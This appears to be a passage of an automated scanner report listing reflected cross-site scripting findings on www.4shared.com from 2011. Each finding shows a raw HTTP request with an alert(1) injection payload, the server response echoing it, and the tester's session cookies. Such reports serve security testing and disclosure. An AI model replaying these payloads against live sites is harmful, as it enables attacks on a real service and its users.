...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.cssfbf19"-alert(1)-"19dccd4f627";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.8. http://www.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c7b'-alert(1)-'bd4abc066e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/main.cssd9c7b'-alert(1)-'bd4abc066e7?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/main.cssd9c7b'-alert(1)-'bd4abc066e7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:56 GMT
Content-Length: 38812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/main.cssd9c7b'-alert(1)-'bd4abc066e7',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.9. http://www.4shared.com/css/mobile20.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mobile20.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30154"-alert(1)-"3a75761dc33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css30154"-alert(1)-"3a75761dc33/mobile20.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css30154"-alert(1)-"3a75761dc33/mobile20.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:51 GMT
Content-Length: 38801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css30154"-alert(1)-"3a75761dc33/mobile20.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.10. http://www.4shared.com/css/mobile20.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mobile20.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a47f7'-alert(1)-'7de5db1bfe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:53 GMT
Content-Length: 38799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.11. http://www.4shared.com/css/mobile20.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mobile20.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d7fe'-alert(1)-'d8c3121ef84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:10 GMT
Content-Length: 38805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
oginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.12. http://www.4shared.com/css/mobile20.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mobile20.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613a7"-alert(1)-"7374be32ded was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/mobile20.css613a7"-alert(1)-"7374be32ded?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mobile20.css613a7"-alert(1)-"7374be32ded
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:05 GMT
Content-Length: 38622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mobile20.css613a7"-alert(1)-"7374be32ded";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.13. http://www.4shared.com/css/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdd0'-alert(1)-'84bbcefcaaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /csscbdd0'-alert(1)-'84bbcefcaaa/style.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /csscbdd0'-alert(1)-'84bbcefcaaa/style.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:05:50 GMT
Content-Length: 38817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/csscbdd0'-alert(1)-'84bbcefcaaa/style.css',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

2.14. http://www.4shared.com/css/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963c0"-alert(1)-"d0f9ab9eff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css963c0"-alert(1)-"d0f9ab9eff7/style.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css963c0"-alert(1)-"d0f9ab9eff7/style.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:05:47 GMT
Content-Length: 38813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css963c0"-alert(1)-"d0f9ab9eff7/style.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.15. http://www.4shared.com/css/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c96c9'-alert(1)-'b79829cc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/style.cssc96c9'-alert(1)-'b79829cc7?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/style.cssc96c9'-alert(1)-'b79829cc7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:07 GMT
Content-Length: 38813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/style.cssc96c9'-alert(1)-'b79829cc7',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.16. http://www.4shared.com/css/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4d7"-alert(1)-"3bd13b9ba48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/style.css1f4d7"-alert(1)-"3bd13b9ba48?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/style.css1f4d7"-alert(1)-"3bd13b9ba48
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:05 GMT
Content-Length: 38822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/style.css1f4d7"-alert(1)-"3bd13b9ba48";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.17. http://www.4shared.com/desktop/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39bd0"-alert(1)-"0194b888027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /desktop39bd0"-alert(1)-"0194b888027/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /desktop39bd0"-alert(1)-"0194b888027/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktop39bd0"-alert(1)-"0194b888027/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.18. http://www.4shared.com/desktop/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c831e'-alert(1)-'76148be9808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /desktopc831e'-alert(1)-'76148be9808/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /desktopc831e'-alert(1)-'76148be9808/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:47 GMT
Content-Length: 38778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/desktopc831e'-alert(1)-'76148be9808/',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.19. http://www.4shared.com/enter.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ad2"-alert(1)-"9871eca0b34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /enter.jspf2ad2"-alert(1)-"9871eca0b34?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /enter.jspf2ad2"-alert(1)-"9871eca0b34
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:35 GMT
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jspf2ad2"-alert(1)-"9871eca0b34";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.20. http://www.4shared.com/enter.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2cc3'-alert(1)-'d37f781642a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /enter.jspf2cc3'-alert(1)-'d37f781642a?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /enter.jspf2cc3'-alert(1)-'d37f781642a
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/enter.jspf2cc3'-alert(1)-'d37f781642a',
remember : true

,sId : 'Sdt45IRrRqsiuJEj'

},
function(){
showLoginBox();
}
);
}els
...[SNIP]...

2.21. http://www.4shared.com/enter.jsp [au parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bd7"style%3d"x%3aexpression(alert(1))"10739e700ef was submitted in the au parameter. This input was echoed as e5bd7"style="x:expression(alert(1))"10739e700ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1e5bd7"style%3d"x%3aexpression(alert(1))"10739e700ef HTTP/1.1
Host: www.4shared.com
